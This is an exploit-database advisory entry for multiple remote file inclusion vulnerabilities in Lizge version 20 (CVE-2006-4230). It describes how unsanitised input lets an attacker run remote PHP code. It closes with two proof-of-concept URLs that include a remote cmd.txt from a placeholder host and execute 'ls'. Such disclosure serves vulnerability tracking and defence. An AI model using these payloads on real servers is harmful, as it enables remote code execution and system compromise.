Lizge 20 - 'index.php' Multiple Remote File Inclusions
Author: Crackers_Child
type: webapps
platform: php
port:
date_added: 2006-08-15
date_updated: 2013-09-19
verified: 1
codes: CVE-2006-4230;OSVDB-29341
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/19533/info
Lizge is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Version V.20 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/[target]/[lizge_path]//index.php?lizge=http://www.example.com/cmd.txt?&cmd=ls http://www.example.com/[target]/[lizges_path]//index.php?bade=http://www.example.com/cmd.txt?&cmd=ls